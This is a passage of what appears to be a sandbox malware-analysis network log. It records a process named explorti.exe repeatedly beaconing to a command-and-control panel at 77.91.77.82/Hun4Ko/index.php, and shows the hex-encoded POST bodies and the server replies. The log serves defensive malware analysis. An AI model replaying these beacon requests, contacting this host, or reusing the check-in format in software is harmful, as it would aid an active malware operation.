Jul 3, 2024 18:09:44.608083010 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:44.827547073 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	62960	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:44.938781023 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:45.619043112 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:45.619884968 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:45.835448027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	62961	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:45.955426931 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:46.641026974 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:46.643790960 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:46.864156008 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	62962	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:46.985938072 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:47.702289104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:47.703069925 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:47.927119970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	62963	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:48.048217058 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:48.733721018 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:48.734534979 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:48.968265057 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	62964	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:49.079917908 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:49.853691101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:49.854569912 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:50.070518970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	62965	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:50.188919067 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:50.883858919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:50.884701967 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:51.105940104 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	62966	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:51.220870018 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:51.934384108 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:51.935308933 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:52.155081987 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	62967	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:52.269040108 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:52.948048115 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:52.949114084 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:53.167275906 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	62968	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:53.282814026 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:53.962038040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:53.962857962 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:54.178462029 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	62969	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:54.298521996 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:55.006325006 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:55.007253885 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:55.229883909 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	62970	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:55.345161915 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:56.018450022 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:56.019319057 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:56.230688095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	62971	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:56.345293999 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:57.050031900 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:57.052906036 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:57.287242889 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
